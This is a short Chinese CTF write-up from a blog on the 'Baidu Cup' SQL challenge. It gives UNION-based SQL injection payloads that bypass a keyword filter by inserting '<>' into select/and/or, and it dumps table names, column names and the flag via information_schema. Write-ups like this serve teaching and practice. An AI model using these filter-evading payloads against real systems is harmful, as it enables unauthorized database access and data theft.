百度杯_sql

SQL

这题很明确就是个sql注入,直接测试看下是啥注入。

可以得知是一个数值型的注入。

把关键字都放上去测试发现过滤了select , and , or,可以使用<>绕过

使用o<>rder by测试只有三列

直接构造payload:爆表
0 union se<>lect 1,group_concat(table_name) ,3 from information_schema.tables where table_schema = database()

img

0 union se<>lect 1,group_concat(column_name) ,3 from information_schema.columns where table_schema = database() a<>nd table_name='info'

img

0 union se<>lect 1,group_concat(flAg_T5ZNdrm) ,3 from info

img

作者:qianyuzz

出处:https://www.cnblogs.com/qianyuzz/p/17397546.html

版权:本作品采用「署名-非商业性使用-相同方式共享 4.0 国际」许可协议进行许可。

posted @   qianyuzz  阅读(66)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· winform 绘制太阳,地球,月球 运作规律
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 上周热点回顾(3.3-3.9)
more_horiz
keyboard_arrow_up dark_mode palette
选择主题
点击右上角即可分享
微信分享提示